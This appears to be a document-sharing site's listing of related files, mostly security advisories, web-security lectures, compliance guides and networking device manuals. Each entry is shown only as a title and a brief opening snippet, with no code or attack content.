Security Research Advisory IBM WebSphere Portal Cross-Site Scripting Vulnerability Security Research Advisory IBM WebSphere Portal Cross-Site Scripting Vulnerability Table of Contents SUMMARY 3 VULNERABILITY DETAILS 3 TECHNICAL DETAILS 4 LEGAL NOTICES 5 Secure Network - Security Research

More information

Surrogate Dependencies (in

Surrogate Dependencies (in Surrogate Dependencies (in NodeJS) @DinisCruz London, 29th Sep 2016 Me Developer for 25 years AppSec for 13 years Day jobs: Leader OWASP O2 Platform project Application Security Training JBI Training,

More information

COMPUTER NETWORK SECURITY

COMPUTER NETWORK SECURITY COMPUTER NETWORK SECURITY Prof. Dr. Hasan Hüseyin BALIK (9 th Week) 9. Firewalls and Intrusion Prevention Systems 9.Outline The Need for Firewalls Firewall Characterictics and Access Policy Type of Firewalls

More information

John Coggeshall Copyright 2006, Zend Technologies Inc.

John Coggeshall Copyright 2006, Zend Technologies Inc. PHP Security Basics John Coggeshall Copyright 2006, Zend Technologies Inc. Welcome! Welcome to PHP Security Basics Who am I: John Coggeshall Lead, North American Professional Services PHP 5 Core Contributor

More information

BlueJeans Room with Dolby Conference Phone. Advanced Configuration Guide

BlueJeans Room with Dolby Conference Phone. Advanced Configuration Guide BlueJeans Room with Dolby Conference Phone Advanced Configuration Guide Version 3.3 14 September 2017 Copyright 2017 Dolby Laboratories. All rights reserved. Dolby Laboratories, Inc. 1275 Market Street

More information

Improving Web Security:

Improving Web Security: Finding and fixing vulnerabilities in web security mechanisms Devdatta Akhawe, Adam Barth, Peifung E. Lam, John C. Mitchell and Dawn Song Stanford Computer Security Lab Improving Web Security: Introduction

More information

M!DGE2 Release Notes Firmware version xxx

M!DGE2 Release Notes Firmware version xxx M!DGE2 Release Notes Firmware version 4.2.40.xxx Release 4.2.40.101 2018-12-10 Note: The firmware 4.2.40.101 is the first official firmware available on our website and for mass production. If you have

More information

Umbra. Embedded Web Security through Application-Layer Firewalls. 1st Workshop on the Security of Cyber-Physical Systems 22 September 2015

Umbra. Embedded Web Security through Application-Layer Firewalls. 1st Workshop on the Security of Cyber-Physical Systems 22 September 2015 Umbra Embedded Web Security through Application-Layer Firewalls Travis Finkenauer J. Alex Halderman 1st Workshop on the Security of Cyber-Physical Systems 22 September 2015 Travis Finkenauer (University

More information

Application security : going quicker

Application security : going quicker Application security : going quicker The web application firewall example Agenda Agenda o Intro o Application security o The dev team approach o The infra team approach o Impact of the agility o The WAF

More information

Provisioning of Algo SIP Endpoints Algo Communication Products Version 1.1 Sept 30, 2015

Provisioning of Algo SIP Endpoints Algo Communication Products Version 1.1 Sept 30, 2015 Provisioning of Algo SIP Endpoints Algo Communication Products Version 1.1 Sept 30, 2015 Contents 1. Introduction... 1 1.1 Supported Devices...2 2. Provisioning Basics... 2 2.1 Server Address & Protocol...2

More information

Carbon Black PCI Compliance Mapping Checklist

Carbon Black PCI Compliance Mapping Checklist Carbon Black PCI Compliance Mapping Checklist The following table identifies selected PCI 3.0 requirements, the test definition per the PCI validation plan and how Carbon Black Enterprise Protection and

More information

Security Research Advisory ToutVirtual VirtualIQ Pro Multiple Vulnerabilities

Security Research Advisory ToutVirtual VirtualIQ Pro Multiple Vulnerabilities Security Research Advisory ToutVirtual VirtualIQ Pro Multiple Vulnerabilities Table of Contents SUMMARY 3 REMOTE COMMAND EXECUTION 4 VULNERABILITY DETAILS 4 TECHNICAL DETAILS 4 INFORMATION LEAKAGE 5 VULNERABILITY

More information

Web Application Vulnerabilities: OWASP Top 10 Revisited

Web Application Vulnerabilities: OWASP Top 10 Revisited Pattern Recognition and Applications Lab Web Application Vulnerabilities: OWASP Top 10 Revisited Igino Corona igino.corona AT diee.unica.it Computer Security April 5th, 2018 Department of Electrical and

More information

IT infrastructure layers requiring Privileged Identity Management

IT infrastructure layers requiring Privileged Identity Management White Paper IT infrastructure layers requiring Privileged Identity Management Abstract Much of today s IT infrastructure is structured as different layers of devices (virtual and physical) and applications.

More information

Microsoft Wireless Router Manual Linksys Password Resetting Cisco

Microsoft Wireless Router Manual Linksys Password Resetting Cisco Microsoft Wireless Router Manual Linksys Password Resetting Cisco Connect to the internet through your wireless router. If you want information about your Linksys router model, Test Network and Internet

More information

Advanced Web Technology 10) XSS, CSRF and SQL Injection

Advanced Web Technology 10) XSS, CSRF and SQL Injection Berner Fachhochschule, Technik und Informatik Advanced Web Technology 10) XSS, CSRF and SQL Injection Dr. E. Benoist Fall Semester 2010/2011 1 Table of Contents Cross Site Request Forgery - CSRF Presentation

More information

Information Security CS 526 Topic 8

Information Security CS 526 Topic 8 Information Security CS 526 Topic 8 Web Security Part 1 1 Readings for This Lecture Wikipedia HTTP Cookie Same Origin Policy Cross Site Scripting Cross Site Request Forgery 2 Background Many sensitive

More information

Attacking the Application OWASP. The OWASP Foundation. Dave Ferguson, CISSP Security Consultant FishNet Security.

Attacking the Application OWASP. The OWASP Foundation. Dave Ferguson, CISSP Security Consultant FishNet Security. Attacking the Application Dave Ferguson, CISSP Security Consultant FishNet Security Copyright The Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the

More information

Ansee Web Server. User Manual. Version: V2.1

Ansee Web Server. User Manual. Version: V2.1 Ansee Web Server User Manual Version: V2.1 May, 2016 Ansee Web Server User Manual 1. Browsing LAN Video and Device Parameter and Web settings... 2 1.1.Browsing under LAN Mode... 2 2.Checking Device Parameter

More information

Kenna Platform Security. A technical overview of the comprehensive security measures Kenna uses to protect your data

Kenna Platform Security. A technical overview of the comprehensive security measures Kenna uses to protect your data Kenna Platform Security A technical overview of the comprehensive security measures Kenna uses to protect your data V3.0, MAY 2017 Multiple Layers of Protection Overview Password Salted-Hash Thank you

More information

Security SSID Selection: Broadcast SSID:

Security SSID Selection: Broadcast SSID: 69 Security SSID Selection: Broadcast SSID: WMM: Encryption: Select the SSID that the security settings will apply to. If Disabled, then the device will not be broadcasting the SSID. Therefore it will

More information

How to Stay Safe on Public Wi-Fi Networks

How to Stay Safe on Public Wi-Fi Networks How to Stay Safe on Public Wi-Fi Networks Starbucks is now offering free Wi-Fi to all customers at every location. Whether you re clicking connect on Starbucks Wi-Fi or some other unsecured, public Wi-Fi

More information

HP 2012 Cyber Security Risk Report Overview

HP 2012 Cyber Security Risk Report Overview HP 2012 Cyber Security Risk Report Overview September 2013 Paras Shah Software Security Assurance - Canada Copyright 2012 Hewlett-Packard Development Company, L.P. The information contained herein is subject

More information

The SANS Institute Top 20 Critical Security Controls. Compliance Guide

The SANS Institute Top 20 Critical Security Controls. Compliance Guide The SANS Institute Top 20 Critical Security Controls Compliance Guide February 2014 The Need for a Risk-Based Approach A common factor across many recent security breaches is that the targeted enterprise

More information

OWASP TOP Release. Andy Willingham June 12, 2018 OWASP Cincinnati

OWASP TOP Release. Andy Willingham June 12, 2018 OWASP Cincinnati OWASP TOP 10 2017 Release Andy Willingham June 12, 2018 OWASP Cincinnati Agenda A quick history lesson The Top 10(s) Web Mobile Privacy Protective Controls Why have a Top 10? Software runs the world (infrastructure,

More information

Certified Secure Web Application Engineer

Certified Secure Web Application Engineer Certified Secure Web Application Engineer ACCREDITATIONS EXAM INFORMATION The Certified Secure Web Application Engineer exam is taken online through Mile2 s Assessment and Certification System ( MACS ),

More information

SOURCEFIRE 3D SYSTEM RELEASE NOTES

SOURCEFIRE 3D SYSTEM RELEASE NOTES SOURCEFIRE 3D SYSTEM RELEASE NOTES Version 5.3.0.2 Original Publication: April 21, 2014 Last Updated: April 25, 2016 These release notes are valid for Version 5.3.0.2 of the Sourcefire 3D System. Even

More information

Security context. Technology. Solution highlights

Security context. Technology. Solution highlights Code42 CrashPlan Security Code42 CrashPlan provides continuous, automatic desktop and laptop backup. Our layered approach to security exceeds industry best practices and fulfills the enterprise need for

More information

PCI DSS v3.2 Mapping 1.4. Kaspersky Endpoint Security. Kaspersky Enterprise Cybersecurity

PCI DSS v3.2 Mapping 1.4. Kaspersky Endpoint Security. Kaspersky Enterprise Cybersecurity Kaspersky Enterprise Cybersecurity Kaspersky Endpoint Security v3.2 Mapping 3.2 regulates many technical security requirements and settings for systems operating with credit card data. Sub-points 1.4,

More information

Common Websites Security Issues. Ziv Perry

Common Websites Security Issues. Ziv Perry Common Websites Security Issues Ziv Perry About me Mitnick attack TCP splicing Sql injection Transitive trust XSS Denial of Service DNS Spoofing CSRF Source routing SYN flooding ICMP

More information

HOW TO FACTORY RESET LINKSYS ROUTER FILE

HOW TO FACTORY RESET LINKSYS ROUTER FILE 11 March, 2018 HOW TO FACTORY RESET LINKSYS ROUTER FILE Document Filetype: PDF 518.51 KB 0 HOW TO FACTORY RESET LINKSYS ROUTER FILE How to reset a E1500 Linksys router to the factory defaults - username,

More information